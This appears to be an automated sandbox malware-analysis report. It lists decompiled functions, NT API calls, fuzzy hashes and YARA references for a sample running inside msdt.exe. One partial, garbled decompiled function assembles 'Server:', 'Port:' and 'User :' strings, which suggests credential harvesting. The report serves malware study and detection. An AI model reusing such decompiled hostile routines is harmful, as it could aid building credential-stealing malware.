ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418528

Memory Dump Source

Source File: 00000004.00000002.352380368.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: bd1f1d00b990849b1b28ea03b0bda0963b0950482f732132c2dd7ed56697f344
Instruction ID: 33e441391f2a0b1e398b113c2e5be7578dcf48d956c97fd458980edbc3fb36c1
Opcode Fuzzy Hash: bd1f1d00b990849b1b28ea03b0bda0963b0950482f732132c2dd7ed56697f344
Instruction Fuzzy Hash: 4BE04F316002507BDB219BA48C89FD73FA89F4A750F1588A9B9999B242C570EA04C6D1

Uniqueness

Uniqueness Score: -1.00%

Function 00418500, Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418528

Memory Dump Source

Source File: 00000004.00000002.352380368.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: 9f62bdc44f65d7d9a2483e28fb075f3ff631dd5cfbab79109080827007e6cc43
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: 62D012716003147BD620DF99DC85FD7779CDF49750F018069BA1C5B241C931BA0086E5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00416282, Relevance: 6.4, Strings: 5, Instructions: 197
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E00416282(signed int __eax, signed char __ebx, void* __edx, signed int __esi) {
				signed int _t73;
				intOrPtr _t84;
				void* _t90;
				intOrPtr _t105;
				void* _t116;
				intOrPtr _t161;
				signed int _t166;
				intOrPtr _t169;
				intOrPtr _t171;
				void* _t174;
				void* _t177;
				void* _t178;
				void* _t179;
				void* _t180;
				void* _t185;

				_t121 = __ebx;
				asm("lodsd");
				asm("fild dword [eax]");
				asm("o16 sub al, 0xcd");
				_t73 = __eax & 0x00000073;
				asm("lahf");
				asm("cli");
				_t166 = __esi &  *(_t73 + 0x20);
				asm("daa");
				gs = _t166;
				asm("in al, dx");
				asm("aad 0x24");
				if(_t166 - 1 <= 0) {
					asm("lock push eax");
					asm("outsd");
					if(__eflags < 0) {
						L6:
						asm("rcr dword [ecx+edx*2], 0xe8");
						 *_t121 =  *_t121 ^ _t121;
						 *_t73 =  *_t73 + _t73;
						_t178 = _t177 + 0x24;
						__eflags =  *((intOrPtr*)(_t161 + 1)) - _t121;
						if( *((intOrPtr*)(_t161 + 1)) != _t121) {
							E0041A090(_t174 - 0x828,  *0x7C773B81, _t121);
							_t51 = _t174 + 8; // 0x72657355
							E0041A090(_t174 - 0x828, _t51, _t121);
							_t53 = _t174 - 0x10; // 0x74726f50
							E0041A090(_t174 - 0x828, _t53, _t121);
							E0041A090(_t174 - 0x828, _t174 - 0x24, _t121);
							_t57 = _t174 + 8; // 0x72657355
							E0041A090(_t174 - 0x828, _t57, _t121);
							_t59 = _t174 - 8; // 0x72657355
							E0041A090(_t174 - 0x828, _t59, _t121);
							_t84 =  *0x7C773B89;
							_t179 = _t178 + 0x48;
							__eflags = _t84 - _t121;
							if(_t84 != _t121) {
								E0041A090(_t174 - 0x828, _t84, _t121);
								_t179 = _t179 + 0xc;
							}
							_t63 = _t174 + 8; // 0x72657355
							E0041A090(_t174 - 0x828, _t63, _t121);
							_t65 = _t174 - 8; // 0x72657355
							E0041A090(_t174 - 0x828, _t65, _t121);
							_t169 =  *0x7C773B8D;
							_t180 = _t179 + 0x18;
							__eflags = _t169 - _t121;
							if(_t169 != _t121) {
								E0041A090(_t174 - 0x828, _t169, _t121);
								_t180 = _t180 + 0xc;
							}
							_push(_t121);
							_t69 = _t174 + 8; // 0x72657355
							_push(_t174 - 0x828);
						} else {
							_t22 = _t174 - 0x828; // 0x12a0ca70
							_t24 = E00419F60(_t22) - 0x828; // 0x12a0ca70
							E0041A330(_t174 + _t24,  *((intOrPtr*)(0x7c773b81)));
							_t25 = _t174 + 8; // 0x72657355
							_t26 = _t174 - 0x828; // 0x12a0ca70
							E0041A090(_t26, _t25, _t121);
							_t27 = _t174 - 0x10; // 0x74726f50
							_t28 = _t174 - 0x828; // 0x12a0ca70
							E0041A090(_t28, _t27, _t121);
							_t30 = _t174 - 0x828; // 0x12a0ca70
							E0041A090(_t30, _t174 - 0x24, _t121);
							_t31 = _t174 + 8; // 0x72657355
							_t32 = _t174 - 0x828; // 0x12a0ca70
							E0041A090(_t32, _t31, _t121);
							_t33 = _t174 - 8; // 0x72657355
							_t34 = _t174 - 0x828; // 0x12a0ca70
							E0041A090(_t34, _t33, _t121);
							_t105 =  *((intOrPtr*)(0x7c773b89));
							_t185 = _t178 + 0x48;
							__eflags = _t105 - _t121;
							if(_t105 != _t121) {
								_t36 = _t174 - 0x828; // 0x12a0ca70
								_t38 = E00419F60(_t36) - 0x828; // 0x12a0ca70
								E0041A330(_t174 + _t38, _t105);
								_t185 = _t185 + 0xc;
							}
							_t39 = _t174 + 8; // 0x72657355
							_t40 = _t174 - 0x828; // 0x12a0ca70
							E0041A090(_t40, _t39, _t121);
							_t41 = _t174 - 8; // 0x72657355
							_t42 = _t174 - 0x828; // 0x12a0ca70
							E0041A090(_t42, _t41, _t121);
							_t171 =  *((intOrPtr*)(0x7c773b8d));
							_t180 = _t185 + 0x18;
							__eflags = _t171 - _t121;
							if(_t171 != _t121) {
								_t44 = _t174 - 0x828; // 0x12a0ca70
								_t46 = E00419F60(_t44) - 0x828; // 0x12a0ca70
								E0041A330(_t174 + _t46, _t171);
								_t180 = _t180 + 0xc;
							}
							_push(_t121);
							_t47 = _t174 + 8; // 0x72657355
							_t48 = _t174 - 0x828; // 0x12a0ca70
						}
						E0041A090();
						_t71 = _t174 - 0x828; // 0x12a0ca70
						_t90 = E00419F60(_t71);
					} else {
						 *((short*)(_t174 - 0xc)) = 0x93a;
						 *((char*)(_t174 - 0xa)) = __ebx;
						 *((intOrPtr*)(_t174 - 8)) = 0x72657355;
						 *((intOrPtr*)(_t174 - 4)) = 0x93a20;
						 *((intOrPtr*)(_t174 - 0x1c)) = 0x76726553;
						 *((intOrPtr*)(_t174 - 0x18)) = 0x93a7265;
						 *((char*)(_t174 - 0x14)) = __ebx;
						 *((char*)(_t174 - 0x828)) = __ebx;
						_t90 = E00419D10();
						_t161 =  *((intOrPtr*)(0x7c773b81));
						_t177 = _t177 + 0xc;
						__eflags = _t161 - __ebx;
						if(_t161 != __ebx) {
							__eflags =  *((intOrPtr*)(0x7c773b89)) - __ebx;
							if( *((intOrPtr*)(0x7c773b89)) != __ebx) {
								_t14 = _t174 - 0x1c; // 0x76726553
								_t116 = E00419F60(_t14);
								_t15 = _t174 - 0x1c; // 0x76726553
								_t16 = _t174 - 0x828; // 0x12a0ca70
								E00419C90(_t16, _t15, _t116);
								_t73 =  *(_t174 - 0x28) & 0x0000ffff;
								_t19 = _t174 - 0x24; // 0x12a0d274
								_push(8);
								_push(__ebx);
								_push(_t73);
								__eflags =  *0x7C773B6D + 0x1c;
								goto L6;
							}
						}
					}
					return _t90;
				} else {
					asm("loop 0x2d");
					asm("stosb");
					asm("fdivr dword [edi]");
					asm("aam 0x7f");
					asm("invalid");
					asm("in eax, dx");
					asm("rol byte [esi+0x251d2ab8], 1");
					return 0x975c39eb;
				}
			}

0x00416282
0x00416283
0x00416284
0x00416286
0x00416289
0x0041628b
0x0041628c
0x0041628d
0x00416290
0x00416292
0x0041629a
0x0041629b
0x0041629d
0x0041630f
0x00416311
0x00416312
0x00416388
0x00416388
0x0041638c
0x0041638e
0x00416390
0x00416393
0x00416396
0x004164a4
0x004164aa
0x004164b5
0x004164bb
0x004164c6
0x004164d7
0x004164dd
0x004164e8
0x004164ee
0x004164f9
0x004164fe
0x00416501
0x00416504
0x00416506
0x00416511
0x00416516
0x00416516
0x0041651a
0x00416525
0x0041652b
0x00416536
0x0041653b
0x0041653e
0x00416541
0x00416543
0x0041654e
0x00416553
0x00416553
0x00416556
0x00416557
0x00416561
0x0041639c
0x004163a0
0x004163ac
0x004163b7
0x004163bd
0x004163c1
0x004163c8
0x004163ce
0x004163d2
0x004163d9
0x004163e3
0x004163ea
0x004163f0
0x004163f4
0x004163fb
0x00416401
0x00416405
0x0041640c
0x00416411
0x00416414
0x00416417
0x00416419
0x0041641c
0x00416428
0x00416433
0x00416438
0x00416438
0x0041643c
0x00416440
0x00416447
0x0041644d
0x00416451
0x00416458
0x0041645d
0x00416460
0x00416463
0x00416465
0x00416467
0x00416474
0x0041647f
0x00416484
0x00416484
0x00416487
0x00416488
0x0041648c
0x00416492
0x00416562
0x00416567
0x00416571
0x00416314
0x00416314
0x0041631a
0x0041631d
0x00416324
0x0041632b
0x00416332
0x00416339
0x0041633c
0x00416342
0x00416347
0x0041634a
0x0041634d
0x0041634f
0x00416355
0x00416358
0x0041635e
0x00416362
0x00416368
0x0041636c
0x00416373
0x00416378
0x0041637f
0x00416383
0x00416385
0x00416386
0x00416387
0x00000000
0x00416387
0x00416358
0x0041634f
0x0041657f
0x0041629f
0x0041629f
0x004162aa
0x004162ab
0x004162ad
0x004162af
0x004162b1
0x004162b9
0x004162c9
0x004162c9

Strings

Port:User :, xrefs: 004163CE, 004163D1
i;w|, xrefs: 00416295
:, xrefs: 00416324
User :, xrefs: 004163BD, 004163F0, 0041643C, 00416488, 004163C0, 004163F3, 0041643F, 0041648B
Server:, xrefs: 0041635E, 00416361

Memory Dump Source

Source File: 00000004.00000002.352380368.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: :$Port:User :$Server:$User :$i;w|
API String ID: 0-407555915
Opcode ID: 69ecba5addc8dece01f55a13fb389ea4f0e30dc16f388ca3a45d156f438493b1
Instruction ID: df5822074f99757eebe8c36bef244144e9795a7748160069533d1e335a1b06ab
Opcode Fuzzy Hash: 69ecba5addc8dece01f55a13fb389ea4f0e30dc16f388ca3a45d156f438493b1
Instruction Fuzzy Hash: A7619BB2801208ABCF11DFA9CC919DF77BCEF19314F04859EE54967101DA35EA98CBE9

Uniqueness

Uniqueness Score: -1.00%

Function 00406A94, Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.352380368.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51da59ea90af1fc6a8f4fd99c046fc8a8cc23f0822bed2630beef142ead17234
Instruction ID: 190d3140a32617d9e811ac84af348f4a04116302b86f7414fd12fdfc823d210d
Opcode Fuzzy Hash: 51da59ea90af1fc6a8f4fd99c046fc8a8cc23f0822bed2630beef142ead17234
Instruction Fuzzy Hash: E2C08C22E5E18E02E6205D0838811F9FB688B13126E6827EBECC4735009082C4324388

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: msdt.exe PID: 3332 Parent PID: 6092 msdt.exeCOMMON

Executed Functions

Function 00A581B0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,00A53B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00A53B87,007A002E,00000000,00000060,00000000,00000000), ref: 00A581FD

Strings

.z`, xrefs: 00A581ED, 00A581F8

Memory Dump Source

Source File: 00000011.00000002.497388587.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: b56d82a1a01106f9a433604131c24b0ec663e4bda681f10be6fc0435bdcfabff
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: 34F0B6B2200108ABCB08CF88DC85DEB77EDAF8C754F158248BA0D97241C630E8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00A582AC, Relevance: 1.6, APIs: 1, Instructions: 57filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(00A53D42,5E972F59,FFFFFFFF,00A53A01,?,?,00A53D42,?,00A53A01,FFFFFFFF,5E972F59,00A53D42,?,00000000), ref: 00A582A5

Memory Dump Source

Source File: 00000011.00000002.497388587.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: c7edd4fd4d06aa36a8b3e72857365d84c1e528433a379cc5388247f8ffbec704
Instruction ID: 69d80ff117255b489a9c33a7f20b765c8ac252121dcfef9c9751de451a6b3fc7
Opcode Fuzzy Hash: c7edd4fd4d06aa36a8b3e72857365d84c1e528433a379cc5388247f8ffbec704
Instruction Fuzzy Hash: 59110972200204AFDB14DF99CC85EEB77A9EF8C754F158658FE1DA7241CA30E915CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A58260, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(00A53D42,5E972F59,FFFFFFFF,00A53A01,?,?,00A53D42,?,00A53A01,FFFFFFFF,5E972F59,00A53D42,?,00000000), ref: 00A582A5

Memory Dump Source

Source File: 00000011.00000002.497388587.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: 9da88f7dc9eb12368098ae139302cdd8933956a0df4b60f0956b481a619c2a4b
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: F0F0A9B2200108ABDB14DF89DC81DEB77ADAF8C754F158248BE1D97241DA30E8118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A5838B, Relevance: 1.5, APIs: 1, Instructions: 32memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00A42D11,00002000,00003000,00000004), ref: 00A583C9

Memory Dump Source

Source File: 00000011.00000002.497388587.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 7ca60511e67bd80e9fdd794548457939173102ca0c3c1b7c239d611a4510c0bf
Instruction ID: 2408593e37cec66b1e8e9e5dc7cb26a26d85f0da33c72987a95a853451c7fd7c
Opcode Fuzzy Hash: 7ca60511e67bd80e9fdd794548457939173102ca0c3c1b7c239d611a4510c0bf
Instruction Fuzzy Hash: 8DF0F2B6200208ABDB18DF99DC95EAB77A9BF88350F158159BE18A7241C630E910CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A58390, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00A42D11,00002000,00003000,00000004), ref: 00A583C9

Memory Dump Source

Source File: 00000011.00000002.497388587.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: c17bade1c29720e66209c3e1621aa281062ed47ddc1a8381637856f318dc7910
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: 65F015B2200208ABDB14DF89CC81EEB77ADAF88750F118148BE08A7241CA30F810CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 00A582E0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00A53D20,?,?,00A53D20,00000000,FFFFFFFF), ref: 00A58305

Memory Dump Source

Source File: 00000011.00000002.497388587.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: 5d6e3c16525511fefa683c2cfe5d1bf297e7b996ad4e6e99995f376d21011476
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: 3CD012762002146BD710EF98CC45ED777ACEF44751F154455BA185B242C930F90086E0

Uniqueness

Uniqueness Score: -1.00%

Function 04D496D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04D496DA

Memory Dump Source

Source File: 00000011.00000002.506193741.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true

Associated: 00000011.00000002.507881606.0000000004DFB000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.507910286.0000000004DFF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fb21f37aab228afdd01a8f8d234d50ff929964fed531d180563b5789ff0530bd
Instruction ID: c1b9ca161d4ccfecd86a1e8536d179cfb34b7580754e8feb84c35172ccab61f1
Opcode Fuzzy Hash: fb21f37aab228afdd01a8f8d234d50ff929964fed531d180563b5789ff0530bd
Instruction Fuzzy Hash: 9990027120100847F50161594404B560026D7E4345F51C016A4115665D8A55D8D17571

Uniqueness

Uniqueness Score: -1.00%

Function 04D496E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04D496EA

Memory Dump Source

Source File: 00000011.00000002.506193741.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true

Associated: 00000011.00000002.507881606.0000000004DFB000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.507910286.0000000004DFF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2be27914de118bb0ad3d825abefe4fce91055d8e4cda096968e0d5200109a27d
Instruction ID: d8adf06b165ffb72afd90bad414ece31c0c7ca0c7a7f6bfb1d9792be74fe888b
Opcode Fuzzy Hash: 2be27914de118bb0ad3d825abefe4fce91055d8e4cda096968e0d5200109a27d
Instruction Fuzzy Hash: 4690027120108807F5116159840475A0026D7D4345F55C411A8415669D8AD5D8D17171

Uniqueness

Uniqueness Score: -1.00%

Function 04D49650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04D4965A

Memory Dump Source

Source File: 00000011.00000002.506193741.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true

Associated: 00000011.00000002.507881606.0000000004DFB000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.507910286.0000000004DFF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cfee98613dfc7d0e367408bd912b0490b5f48effff9a54da8d2384d121e5aa08
Instruction ID: 3a22d37f3bbff2eecedebd2c10c79bfdfb9e353ba3963fe656421bd3b1f2cb46
Opcode Fuzzy Hash: cfee98613dfc7d0e367408bd912b0490b5f48effff9a54da8d2384d121e5aa08
Instruction Fuzzy Hash: E790027120504847F54171594404A560036D7D4349F51C011A40556A5D9A65DDD5B6B1

Uniqueness

Uniqueness Score: -1.00%

Function 04D49A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04D49A5A

Memory Dump Source

Source File: 00000011.00000002.506193741.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true

Associated: 00000011.00000002.507881606.0000000004DFB000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.507910286.0000000004DFF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 17556edda7149db2769eda6447887e24bbec9c94a129c0c6e96f8aa6e0dc9135
Instruction ID: 678e5ff29de4419d81ed4e8c58f397f997e24d9ee2ca0b6bec75fb2a486490cd
Opcode Fuzzy Hash: 17556edda7149db2769eda6447887e24bbec9c94a129c0c6e96f8aa6e0dc9135
Instruction Fuzzy Hash: 6C90026121180047F60165694C14B170026D7D4347F51C115A4145565CCD55D8E16571

Uniqueness

Uniqueness Score: -1.00%

Function 04D49840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04D4984A

Memory Dump Source

Source File: 00000011.00000002.506193741.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true

Associated: 00000011.00000002.507881606.0000000004DFB000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.507910286.0000000004DFF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 87b7747212743c6fb9a9e856960d62439b2c809bbcd5784c618a29f30b70795e
Instruction ID: 6dbbc1bde090bdf8b7e8a842120601c07f9cd1d6d3ff2ad988fe6beb003fbc7f
Opcode Fuzzy Hash: 87b7747212743c6fb9a9e856960d62439b2c809bbcd5784c618a29f30b70795e
Instruction Fuzzy Hash: DF900261242041577946B15944045174027E7E4285791C012A5405961C8966E8D6E671

Uniqueness

Uniqueness Score: -1.00%

Function 04D49860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04D4986A

Memory Dump Source

Source File: 00000011.00000002.506193741.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true

Associated: 00000011.00000002.507881606.0000000004DFB000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.507910286.0000000004DFF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e7ffda01e1a0fb26c7004b935f4314120ce202eaabade2006b41c6b4fbe9a6d5
Instruction ID: ecd16f8c2f7bce230b2782348d6c73f3ad40cbfa4e5e8f2c1169a1f8aa148745
Opcode Fuzzy Hash: e7ffda01e1a0fb26c7004b935f4314120ce202eaabade2006b41c6b4fbe9a6d5
Instruction Fuzzy Hash: 9390027120100417F51261594504717002AD7D4285F91C412A4415569D9A96D9D2B171

Uniqueness

Uniqueness Score: -1.00%

Function 04D49660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04D4966A

Memory Dump Source

Source File: 00000011.00000002.506193741.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true

Associated: 00000011.00000002.507881606.0000000004DFB000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.507910286.0000000004DFF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0ac2f52a4312ae0cccc7f0043349c7658561dcee14db1e875a53744a16e59e68
Instruction ID: 9faa4b3342f91cb134115a259af19eaa3f2cd709fb96001501cef6aa86e0f1a5
Opcode Fuzzy Hash: 0ac2f52a4312ae0cccc7f0043349c7658561dcee14db1e875a53744a16e59e68
Instruction Fuzzy Hash: E290027120100807F5817159440465A0026D7D5345F91C015A4016665DCE55DAD977F1

Uniqueness

Uniqueness Score: -1.00%

Function 04D495D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04D495DA

Memory Dump Source

Source File: 00000011.00000002.506193741.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true

Associated: 00000011.00000002.507881606.0000000004DFB000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.507910286.0000000004DFF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 54e5959b7c9787f2f07a086800339a1b7eae16f6b52afae5150ad957662fa104
Instruction ID: 00f3e1c2e6837de69e1660bdec39b919d366f00e9692fb672cc092014966969c
Opcode Fuzzy Hash: 54e5959b7c9787f2f07a086800339a1b7eae16f6b52afae5150ad957662fa104
Instruction Fuzzy Hash: 4E9002A120200007650671594414626402BD7E4245B51C021E50055A1DC965D8D17175

Uniqueness

Uniqueness Score: -1.00%

Function 04D49FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04D49FEA

Memory Dump Source

Source File: 00000011.00000002.506193741.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true

Associated: 00000011.00000002.507881606.0000000004DFB000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.507910286.0000000004DFF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: aed352d677f879a9c844830a00e70e49314be865b52c01c975c0f6dd8ccc09d8
Instruction ID: 10755118722a2e3d5213c788cd90b96d36164c992c762abdc5c94ec74176c91c
Opcode Fuzzy Hash: aed352d677f879a9c844830a00e70e49314be865b52c01c975c0f6dd8ccc09d8
Instruction Fuzzy Hash: 4D90027131114407F511615984047160026D7D5245F51C411A4815569D8AD5D8D17172

Uniqueness

Uniqueness Score: -1.00%

Function 04D49780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04D4978A

Memory Dump Source

Source File: 00000011.00000002.506193741.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true

Associated: 00000011.00000002.507881606.0000000004DFB000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.507910286.0000000004DFF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: eeb4bbc97ce30020a58a72487ccd2dca6f1a475e3618d536b77851531f459ef3
Instruction ID: c3f7c06d942f6fa1c765aab8419422451e59b0cde29e12033910affab092733e
Opcode Fuzzy Hash: eeb4bbc97ce30020a58a72487ccd2dca6f1a475e3618d536b77851531f459ef3
Instruction Fuzzy Hash: 3190026921300007F5817159540861A0026D7D5246F91D415A4006569CCD55D8E96371

Uniqueness

Uniqueness Score: -1.00%

Function 04D499A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04D499AA

Memory Dump Source

Source File: 00000011.00000002.506193741.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true

Associated: 00000011.00000002.507881606.0000000004DFB000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.507910286.0000000004DFF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a4627f9d31810aa594a675633fbf4b8e6ee1e38ed2c95323fe14a53e2f5aa186
Instruction ID: d294e41e0e80232f9b66d59f52d87a23cf6bf0d61883b3c0a87b2db262c56762
Opcode Fuzzy Hash: a4627f9d31810aa594a675633fbf4b8e6ee1e38ed2c95323fe14a53e2f5aa186
Instruction Fuzzy Hash: 5C9002A134100447F50161594414B160026D7E5345F51C015E5055565D8A59DCD27176

Uniqueness

Uniqueness Score: -1.00%

Function 04D49540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04D4954A

Memory Dump Source

Source File: 00000011.00000002.506193741.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true

Associated: 00000011.00000002.507881606.0000000004DFB000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.507910286.0000000004DFF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d986fd3006f1585d8be7197b9b0ba70ba7c29c5b9abf246ab0da9c3fc6f1b9f3
Instruction ID: 74783ead404c26a5a060f4dcd056f52327564153c8e9ecf88320a33247e6b5d0
Opcode Fuzzy Hash: d986fd3006f1585d8be7197b9b0ba70ba7c29c5b9abf246ab0da9c3fc6f1b9f3
Instruction Fuzzy Hash: 84900265211000072506A55907045170067D7D9395351C021F5006561CDA61D8E16171

Uniqueness

Uniqueness Score: -1.00%

Function 04D49710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04D4971A

Memory Dump Source

Source File: 00000011.00000002.506193741.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true

Associated: 00000011.00000002.507881606.0000000004DFB000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.507910286.0000000004DFF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e1eae3d24c29f68b416d19c762311a9cb023d6efcd1a1a4e2801be0a6bccdb08
Instruction ID: 405ce9e05903a509f87b6b5bef32a93de508473e3a3440ffe6465f07eef14117
Opcode Fuzzy Hash: e1eae3d24c29f68b416d19c762311a9cb023d6efcd1a1a4e2801be0a6bccdb08
